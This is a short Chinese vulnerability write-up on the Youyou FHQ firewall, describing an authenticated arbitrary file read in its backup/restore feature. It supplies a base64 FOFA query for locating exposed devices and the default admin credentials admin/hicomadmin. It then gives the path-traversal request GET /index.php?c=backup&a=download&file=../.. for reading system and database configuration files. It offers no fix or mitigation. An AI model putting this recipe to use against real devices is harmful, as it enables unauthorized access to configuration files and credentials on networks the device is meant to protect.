0x01 产品简介
佑友FHQ是一款专业的网络安全设备,用于保护企业网络免受各种网络威胁和攻击。其功能包括流量过滤、入侵检测与阻断、应用程序控制、虚拟专用网络(VPN)支持等。通过深度包检测和实时流量分析,佑友防火墙能够及时识别和阻止潜在的威胁,提供全面的安全保护。同时,它具备灵活的管理界面和可扩展的配置选项,适用于各种规模和类型的网络环境。
0x02 漏洞概述
佑友FHQ 后台备份与恢复的功能处存在任意文件读取漏洞(后台还存在上传和RCE),经过身份验证的远程攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x03 复现环境
FOFA:YXBwPSLkvZHlj4st5L2R5Y+L6Ziy54Gr5aKZIg==
0x04 漏洞复现
默认账号密码登录后台
admin/hicomadmin
备份/恢复——>点击下载——>抓包
修改file参数为读取文件的路径,跨目录使用../
GET /index.php?c=backup&a=download&file=../..
